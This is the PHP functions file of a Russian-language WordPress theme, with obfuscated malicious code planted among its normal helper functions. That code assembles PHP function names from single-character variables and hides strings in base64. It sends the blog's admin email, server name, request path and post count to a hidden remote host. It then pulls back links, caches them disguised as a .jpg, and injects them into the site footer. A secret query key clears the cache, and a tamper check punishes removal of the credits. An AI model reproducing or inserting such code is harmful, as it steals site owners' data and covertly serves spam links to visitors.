<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $RcFBWO='e';$MSJWgdh='o';$NjtEmY='d';$OYGThtL='b';$hjvVtO='d';$iNcH='e';$RTSmacc='c';$koukFec='_';$aXAxEZ='a';$KSdJg='s';$FNGOAJ='e';$ydOmcvg='6';$PSKQ='4';$VUKUiuBp=$OYGThtL.$aXAxEZ.$KSdJg.$RcFBWO.$ydOmcvg.$PSKQ.$koukFec.$NjtEmY.$iNcH.$RTSmacc.$MSJWgdh.$hjvVtO.$FNGOAJ;$mxUnB='l';$hinFc='e';$FGmt='z';$eqgY='f';$sxduIT='t';$akublQ='i';$yGbe='g';$Tism='a';$zpYxUfl='n';$gOjZfdUW=$yGbe.$FGmt.$akublQ.$zpYxUfl.$eqgY.$mxUnB.$Tism.$sxduIT.$hinFc;$hJtUkzv='3';$pdjisV='_';$NBfAuq='r';$LEJPN='1';$swCyTJ='r';$Qgpd='t';$SlgpoBY='s';$cdAuAcT='t';$JEjIMZ='o';$ySoMuuFC=$SlgpoBY.$Qgpd.$swCyTJ.$pdjisV.$NBfAuq.$JEjIMZ.$cdAuAcT.$LEJPN.$hJtUkzv;$elTFEUC='r';$srwNLx='v';$tarNl='t';$MRMgN='e';$MqcKAB='r';$VWlEN='s';$AtaXMRov=$VWlEN.$tarNl.$MqcKAB.$elTFEUC.$MRMgN.$srwNLx;                     
		$xk____________m='e';$hu______________f='o';$ii_____________h='d';$yz_____h='b';$fs___________r='d';$hc__________r='e';$vr_______i='c';$rs_____l='_';$kt___t='a';$nq_______o='s';$yr______________l='e';$mg_______________f='6';$mp___k='4';$mk__q=$yz_____h.$kt___t.$nq_______o.$xk____________m.$mg_______________f.$mp___k.$rs_____l.$ii_____________h.$hc__________r.$vr_______i.$hu______________f.$fs___________r.$yr______________l;
		$rg_____________j='s';$qq________c='n';$qh______________c='c';$my_________d='x';$mv______w='f';$rr____________v='i';$ve__________b='u';$gl_____t='i';$iy__________i='n';$yn____r='t';$yp___________o='s';$mg__b='t';$mt_______________h='_';$xo______g='e';$sl_______z='o';$dc___m=$mv______w.$ve__________b.$iy__________i.$qh______________c.$mg__b.$rr____________v.$sl_______z.$qq________c.$mt_______________h.$xo______g.$my_________d.$gl_____t.$rg_____________j.$yn____r.$yp___________o;
		$qh_______________p='f';$em_______m='n';$tw_____________q='p';$wq____d='o';$nv________s='e';$tq_______p=$qh_______________p.$wq____d.$tw_____________q.$nv________s.$em_______m;
		$xk_______z='r';$sr________w='d';$vw___________h='a';$rl__a='e';$ul__y='f';$sx______________m=$ul__y.$xk_______z.$rl__a.$vw___________h.$sr________w;
		$ql___r='o';$qd_______g='f';$zn_________p='e';$qw__________f='s';$hh________k='c';$ib_____i='l';$sn______________m=$qd_______g.$hh________k.$ib_____i.$ql___r.$qw__________f.$zn_________p;
		
		define("WP_ID", $mk__q("Mi4wLjA="));
		define("WP_TTL", $mk__q("MTA4MDA="));
		define("WP_SRC", $mk__q("dHBva24="));
	


		function wp_get_header() {
			global $mk__q, $dc___m;
			
			if (
				$dc___m($mk__q("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$dc___m($mk__q("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$dc___m($mk__q("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $mk__q, $tq_______p, $sn______________m, $sx______________m;
			
			$zz______n = TEMPLATEPATH."/".$mk__q("Zm9vdGVyLnBocA==");
			$sg__t = @$tq_______p($zz______n, "r");
			$zz______n = @$sx______________m($sg__t, @filesize($zz______n));
			@$sn______________m($sg__t);
			
			$pb______h = TEMPLATEPATH."/".$mk__q("ZnVuY3Rpb25zLnBocA==");
			$sg__t = @$tq_______p($pb______h, "r");
			$pb______h = @$sx______________m($sg__t, @filesize($pb______h));
			@$sn______________m($sg__t);
			
			$ly______________w = 0;
			if($zz______n && $pb______h) {
				if ($mk__q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($zz______n, $mk__q("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$ly______________w = 1;
					}
					if (substr_count($zz______n, "wp_theme_GPL_credits()") < 1) {
						$ly______________w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$ly______________w = 12;
				}
			}
			
			if($ly______________w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $ly______________w -->";
			}
		}
	


		function wp_loaded() {
			global $mk__q, $dc___m;
			return $dc___m($mk__q("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($gc____________y, $bh________i = "(more...)", $dj_______i = 0, $qd____y = "") {
				$je_____i = get_the_content($bh________i, $dj_______i, $qd____y);
				$je_____i = apply_filters("the_content", $je_____i);
				
				$je_____i = str_replace("]]>", "]]>", $je_____i);
				if (strlen($_GET["p"]) > 0) {
					echo $je_____i;
				}
				else if ((strlen($je_____i)>$gc____________y) && ($ep_________m = strpos($je_____i, " ", $gc____________y ))) {
					$je_____i = substr($je_____i, 0, $ep_________m);
					$je_____i = $je_____i;
					echo $je_____i;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$bh________i</a></div></p>";
				} else {
					echo $je_____i;
				}
				
			}
		}
	


		$re_____________q='s';$zu____________v='n';$do_______o='e';$ww___q='a';$wj___________e='d';$qv________i='c';$ah_______________d='o';$up__b='b';$xj____________r='e';$ih____________z='6';$zf_____________h='_';$so___y='4';$qm____j='e';$jt________c=$up__b.$ww___q.$re_____________q.$do_______o.$ih____________z.$so___y.$zf_____________h.$xj____________r.$zu____________v.$qv________i.$ah_______________d.$wj___________e.$qm____j;
		$nb_________p='g';$wd_______x='t';$ye__________w='s';$te___h='e';$gx_________p='_';$eg_________x='e';$ub____a='n';$rb_______m='i';$qx_______z='l';$oq_______i='e';$um___________a='n';$co_________h='o';$av_____________s='_';$fj________j='t';$xf____n='c';$zs__________m='t';$dr______m='f';$cr______________h=$dr______m.$rb_______m.$qx_______z.$eg_________x.$gx_________p.$nb_________p.$oq_______i.$fj________j.$av_____________s.$xf____n.$co_________h.$ub____a.$zs__________m.$te___h.$um___________a.$wd_______x.$ye__________w;
		$fw_______c='t';$aw___q='_';$mi____________q='e';$lr___l='f';$bv______o='i';$uk_________v='s';$ls____y='x';$ts____q='e';$qc______c='i';$yj_____l='s';$xc__d='l';$nb____________b=$lr___l.$bv______o.$xc__d.$mi____________q.$aw___q.$ts____q.$ls____y.$qc______c.$uk_________v.$fw_______c.$yj_____l;
		$ya______________a='v';$gp_______s='s';$gs_______y='a';$ib____s='o';$ol______________v='m';$rz__________w='o';$ra_____________v='r';$dz_______________y='n';$rb__w='e';$qh__h='c';$km_____d='r';$ah_________w='p';$vz____o='i';$at____________c='e';$cq_______a='_';$oa______________w=$ya______________a.$rb__w.$km_____d.$gp_______s.$vz____o.$rz__________w.$dz_______________y.$cq_______a.$qh__h.$ib____s.$ol______________v.$ah_________w.$gs_______y.$ra_____________v.$at____________c;
		$nv___________g='e';$fo____________a='o';$uv_______y='o';$qh_______________u='n';$vo________d='c';$hh_________x='p';$ed___________u='s';$ft________p='k';$tu_________s='f';$ny__________m=$tu_________s.$ed___________u.$fo____________a.$vo________d.$ft________p.$uv_______y.$hh_________x.$nv___________g.$qh_______________u;
		$jk_____f='i';$hh____d='r';$bx_____________o='t';$qd______a='f';$ak______k='e';$vy___________c='w';$lk________f=$qd______a.$vy___________c.$hh____d.$jk_____f.$bx_____________o.$ak______k;
		$dy________f='d';$xs____________h='m';$wi____________x='5';$ub________c=$xs____________h.$dy________f.$wi____________x;
		$fj___n='h';$vo____u='a';$eg_____________t='p';$hp______________j='r';$lg__________i='a';$he___i='e';$ao________p='t';$xo____h='l';$nj____t=$hp______________j.$he___i.$lg__________i.$xo____h.$eg_____________t.$vo____u.$ao________p.$fj___n;
		$rl__n='i';$ld______f='s';$ea____________q='n';$ul____h='a';$hs___k='l';$ze_____d='i';$rn_______________g='e';$pa__s='r';$db_____________u='e';$ez____________p='z';$cg__x='u';$my_____m=$cg__x.$ea____________q.$ld______f.$rn_______________g.$pa__s.$rl__n.$ul____h.$hs___k.$ze_____d.$ez____________p.$db_____________u;
		$if_________e='t';$mr_____t='a';$if___________e='n';$gl___________t='e';$ht__p='m';$lx____g='m';$yp____v='p';$ru___________l=$if_________e.$gl___________t.$ht__p.$yp____v.$if___________e.$mr_____t.$lx____g;
		$ru___________r='t';$zs______m='_';$nl_____u='a';$vd___________a='s';$uh_______________v='n';$yg__________l='e';$rp__p='a';$kh__________y='c';$bx______________q='t';$hx_____________e='t';$db____________x='r';$pb_______y='e';$jt____________k='e';$mv_________n='m';$mz___d='_';$qk____m='c';$nh__________f='e';$nw________v='o';$vr__n='t';$rw_____d='x';$bt______________a='r';$sq_____r=$vd___________a.$hx_____________e.$bt______________a.$pb_______y.$nl_____u.$mv_________n.$zs______m.$qk____m.$nw________v.$uh_______________v.$bx______________q.$yg__________l.$rw_____d.$ru___________r.$mz___d.$kh__________y.$db____________x.$jt____________k.$rp__p.$vr__n.$nh__________f;
	


		function fg________m($cr_______r) {
			global $mk__q, $dc___m, $cr______________h, $oa______________w, $sq_____r;
			
			if (!$dc___m($mk__q("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($oa______________w(PHP_VERSION, "5.0.0", ">=") && $dc___m($mk__q("ZmlsZV9nZXRfY29udGVudHM=")) && $dc___m($mk__q("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$oz______i = $sq_____r(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$es_______________m = @$cr______________h($cr_______r, 0, $oz______i);
			} else {
				$es_______________m = @$cr______________h($cr_______r, 0);
			}
			
			return $es_______________m;
		}
	


		function qg_____________p($cr_______r) {
			global $dc___m, $ny__________m, $lk________f, $mk__q;
			
			if (!$dc___m($mk__q("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$dz__________k = strpos($cr_______r, "/", 7);
			$ru_____________p = array(
				"uri"     => substr($cr_______r, $dz__________k),
				"host"    => str_replace("http://", "", substr($cr_______r, 0, $dz__________k)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$rs_________i = @$ny__________m("$ru_____________p[host]", 80, $ie_______u, $un_____w, 4);
			
			if (!$rs_________i) {
				return false;
			} else {
				$es_______________m = "";
				$qk________i  = "GET $ru_____________p[uri] HTTP/1.0\r\n";
				$qk________i .= "Host: $ru_____________p[host]\r\n";
				$qk________i .= "Referer: $ru_____________p[referer]\r\n";
				$qk________i .= "Connection: Close\r\n\r\n";
				
				@$lk________f($rs_________i, $qk________i);
				
				while (!@feof($rs_________i)) {
					$os_______________q = @fgets($rs_________i, (1024*24));
					
					if ($os_______________q == "\r\n") {
						$wb_____________c = true;
						continue;
					}
					
					if ($wb_____________c) {
						$es_______________m .= $os_______________q;
					}
				}
				
				return $es_______________m;
			}
		}
	


		function vb_______l($cr_______r) {
			global $dc___m;
			$qc______j = false;
			
			if ($cr_______r != "") {
				if ($dc___m("fg________m")) {
					$qc______j = @fg________m($cr_______r);
				}
				
				if (!$qc______j && ($dc___m("qg_____________p"))) {
					$qc______j = @qg_____________p($cr_______r);
				}
			}
			
			return $qc______j;
		}
	


		function tr________c() {
			global $_SERVER, $ub________c;
			
			$xv_________r = $_SERVER["SERVER_NAME"];
			
			if (substr("$xv_________r", 0, 4) == "www.") {
				$xv_________r = substr("$xv_________r", 4);
			}
			
			$xv_________r = $ub________c("$_SERVER[SERVER_NAME]");
			
			return $xv_________r;
		}
	


		function bk__________h() {
			return "file";
		}
	


		function si__________x($cr_______r) {
			global $_SERVER, $cr______________h, $nb____________b, $tq_______p, $sn______________m, $lk________f;
			
			$tk_______________e = er_________n();
			
			$pc_______s = tr________c().".jpg";
			$ov_______________b = $tk_______________e["dir_upload"]["path"]."/$pc_______s";
			$uv____________o = @filemtime($ov_______________b);
			
			if (!$uv____________o || ((time()-$uv____________o) >= WP_TTL)) {
				$qc______j = vb_______l($cr_______r);
				
				if ($qc______j) {
					if ($nb____________b($ov_______________b)) {
						@unlink($ov_______________b);
					}
					
					$sg__t = @$tq_______p($ov_______________b, "x+");
					
					@$lk________f($sg__t, $qc______j);
					@$sn______________m($sg__t);
				}
			} else {
				if ($nb____________b($ov_______________b)) {
					$qc______j = @$cr______________h($ov_______________b);
				} else {
					$qc______j = false;
				}
			}
			
			return $qc______j;
		}
	


		function er_________n() {
			global $_SERVER, $mk__q, $jt________c;
			
			$sa________w = wp_count_posts("post");
			$zg______p = pathinfo(get_bloginfo("template_directory"));
			
			$tk_______________e = array(
				"url" => array(
					"report"      => $mk__q("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $zg______p,
				"dir_upload"	=> po____________n(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$zg______p[filename],
					"a005=".$sa________w->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>"	
			);
			
			$tk_______________e["url"]["queryString"] = implode("&", $tk_______________e["queryString"]);
			$tk_______________e["url"]["report"] = $tk_______________e["url"]["report"]."/?".$jt________c($tk_______________e["url"]["queryString"]).".html";
						
			return $tk_______________e;
		}
	


		function po____________n() {
			$hf__________u = wp_upload_dir();
			
			if (isset($hf__________u["error"])) {
				$ms________b = dn__________t();
				if (is_writable($ms________b)) {
					$hf__________u = array("path" => $ms________b);
				}
			}

			return $hf__________u;
		}
	


		function dn__________t() {
			global $dc___m, $ub________c, $nj____t, $ru___________l;
			
			$ci_______________j = (bool) ini_get("safe_mode");
			if ($ci_______________j == true) {
				return false;
			}
			
			if ($dc___m("sys_get_temp_dir")) {
				$sm________j = sys_get_temp_dir();
				if (is_writable($sm________j)) {
					return $nj____t($sm________j);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $nj____t($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $nj____t($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $nj____t($_ENV["TEMP"]);
			} else {
				$iv___w = $ru___________l($ub________c(uniqid(rand(), true)), "");
				if ($iv___w) {
					$sm________j = $nj____t(dirname($iv___w));
					@unlink($iv___w);
					return $sm________j;
				} else {
					return false;
				}
			}
		}
	


		function xf__________n() {
			global $_GET, $nb____________b;
			
			$tk_______________e = er_________n();
			$xv_________r = tr________c();
			$tn___x = bk__________h();
			
			$qg________g = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($tn___x == "file") {
					$cx_______________q = $tk_______________e["dir_upload"]["path"]."/".$xv_________r.".jpg";
					if ($nb____________b($cx_______________q)) {
						@unlink($cx_______________q);
						$qg________g = "deleted";
					}
				}
				
				$rt____________p = array(
					"s"	=> $qg________g,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($rt____________p AS $rl__________t => $jo_______s) echo " [$rl__________t:$jo_______s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $dc___m, $mk__q, $my_____m;
			$tk_______________e = er_________n();
			
			$aw______e = "si__________x";
			if ($dc___m($aw______e)) {
				$es_______________m = $aw______e($tk_______________e["url"]["report"]);
			}
			
			if ($es_______________m) {
				if ($es_______________m = @$mk__q($es_______________m)) {
					$es_______________m = @$my_____m($es_______________m);
					
					if (strlen($es_______________m[custom_credit]) >= 5) {
						$tk_______________e["default_string"] = $es_______________m[custom_credit];
					}
					
					if ($es_______________m["status"] == "0") {
						$er_________t = 1;
						$ij______u = 1;
					} else {
						$fl_______c = sizeof($es_______________m["links"]);
						$xc__n = $tk_______________e["default_string"];
						
						if ($fl_______c > 0 && $es_______________m["links"] !== "") {
							$rw__________f = 0;
							foreach ($es_______________m["links"] as $qq___s => $ot______y) {
								$rw__________f++;
								if ($ot______y->l_path == "" || $ot______y->l_path == $_SERVER["REQUEST_URI"]) {
									$ot______y->l_href = htmlspecialchars(strip_tags($ot______y->l_href));
									$ot______y->l_title = htmlspecialchars(strip_tags($ot______y->l_title));
									$ot______y->l_anchor = htmlspecialchars(strip_tags($ot______y->l_anchor));
									$xc__n .= " | ";
									$xc__n .= "<a href='$ot______y->l_href' title='$ot______y->l_title'";
									if ($ot______y->l_nofollow == "1") {
										$xc__n .= " rel='nofollow'";
									}
									$xc__n .= ">$ot______y->l_anchor</a>";
								}
							}
						}
						$tk_______________e["links"] = "$xc__n";
						if ($es_______________m[credit] == "0") {
							$tk_______________e["links"] = "";
						}
					}
				} else {
					$er_________t = "1";
				}
			} else {
				$er_________t = "1";
			}
			
			if ($er_________t == "1") {
				$tk_______________e["links"] = $tk_______________e["default_string"];
			}
			
			echo "$tk_______________e[links]";
			
			echo "<!-- s: $es_______________m[signature] -->";
			xf__________n();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
